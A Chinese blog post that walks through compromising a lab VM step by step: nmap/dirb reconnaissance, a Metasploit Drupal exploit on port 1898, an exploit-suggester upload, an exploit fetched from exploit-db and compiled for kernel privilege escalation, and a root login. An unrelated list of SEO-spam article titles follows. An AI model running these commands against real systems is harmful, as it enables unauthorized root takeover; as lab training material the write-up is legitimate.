当前位置: 首页 > news >正文

网站建设亇金手指下拉排名罒如何创建网站

网站建设亇金手指下拉排名罒,如何创建网站,网站建设 域名 数据库,泰安北京网站建设公司nmap扫描全网段,发现存货主机,ip为192.168.85.141nmap 192.168.85.0/24nmap 扫描端口,发现80端口,访问该网站nmap -p1-65535 192.168.85.141扫描该网站目录,什么也没扫出来 ,dirb扫描目录的字典在usr/share…
  1. nmap扫描全网段,发现存货主机,ip为192.168.85.141

nmap 192.168.85.0/24
  1. nmap 扫描端口,发现80端口,访问该网站

nmap -p1-65535 192.168.85.141
  1. 扫描该网站目录,什么也没扫出来 ,dirb扫描目录的字典在usr/share/wordlist,ssh爆破成功的可能性不大

dirb http://192.168.85.141
  1. 访问网站1898试一下,发现网站,web常规漏洞不行(sql,弱口令),使用wapplayzer查看网站的中间信息,发现cms是drupa,或者观察网站

5.kali 搜索相关漏洞,一个一个试

msfconsole                         #打开msf
search drupal                      #搜索和drupal相关的信息

使用第一个exp

use 1
show  options          #查看要配置的参数

这个地方yes是必填项,rport需要改成1898

set rport 1898                 #设置目标端口
set rhosts 192.168.85.141      #设置目标ip
run                           #运行

成功获取meterpreter

查看权限

getuid

上传漏洞扫描文件

upload /root/les.sh  /tmp/les.sh     #上传本地root目录下的文件到对方tmp目录下
upload /root/l2.pl /tmp/l2.plww      #上传本地root目录下的文件到对方tmp目录下

linux-exploit-suggester1

linux-exploit-suggester2

这两个文件是漏洞探针文件,是检测系统有没有内核漏洞的

进入shell

shell

非交互式shell

python -c "import pty;pty.spawn('/bin/bash')"    #使用python构建交互式shell

进入tmp目录:

cd /tmp                 #进入tmp目录
ls                      #查看文件
chmod u+x ./les.sh      #为文件加执行权限
chmod u+s  ./l2.pl
./les.sh                #执行文件
./l2.pl

linux-exploit-suggester2,可以发现2版本没跑出来

linux-exploit-suggester1

利用漏洞,根据脚本给出的地址下载漏洞,下载的格式可能是c++或c,需要用gcc或g++进行编译,还以可以在本地下

下载exp时注意内核版本是否匹配,但是

wget https://www.exploit-db.com/exploits/40839   #下载对应的exp,这个exp运行不了

到网站下载https://www.exploit-db.com/,搜索相关漏洞

一个一个试,上传文件,编译是cpp文件,并运行

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40 40611.cpp -lutil
./docw

更改密码成功

切换用户到root,或使用ssh登录

su root            #输入密码
whoami
或者
ssh 192.168.85.141    #输入密码即可

ssh登录成功

漏洞exp:
https://www.exploit-db.com/
https://github.com/nomi-sec/PoC-in-GitHub/tree/master

http://www.wangmingla.cn/news/38513.html

相关文章:

  • 宁波网站推广营销公司海东地区谷歌seo网络优化
  • prestashop和wordpress百度网站优化
  • 免费响应式网站模板seo排名优化的方法
  • java做网站开发的流程微信推广
  • 淮北市网站制作公司免费网站收录网站推广
  • 网站如何做性能测试全网推广哪家正宗可靠
  • 网站开发学校手机网站模板免费下载
  • 网站建设方案书 个人备案搜索竞价
  • 宁国网站设计公司北京seo邢云涛
  • 有保障的广州网站建设推广引流方法有哪些推广方法
  • 亚马逊网站托管怎么做seo快速排名多少钱
  • 58同城通辽做网站百度指数入口
  • 微网站自己可以做么鸿星尔克网络营销案例分析
  • 做黑彩网站会怎样处罚微信软文案例
  • 重庆社区app最新版本下载武汉seo引擎优化
  • 哪里有零基础网站建设教学双11销售数据
  • 做网站需要购买什么百度站长平台app
  • 手机网站开发怎么注册网站
  • 网站赚钱系统长沙关键词优化首选
  • 网站设计项目策划ppt北京网站优化培训
  • wordpress手机端样式seo优化的基本流程
  • 天动力网站开发网页制作教程书籍
  • 网站推广方式介绍优帮云排名优化
  • 手赚网站哪里可以做网站宣传和推广的方法有哪些
  • 网站开发的实训周搜索量排名
  • 商丘网站制作公司网站排名优化+o+m
  • 虎门专业做网站公司友情链接网站
  • 旅游在哪个网站做攻略免费舆情监测平台
  • 给小孩子做网站友情链接买卖
  • 做外挂的网站叫蜗牛怎么关闭seo综合查询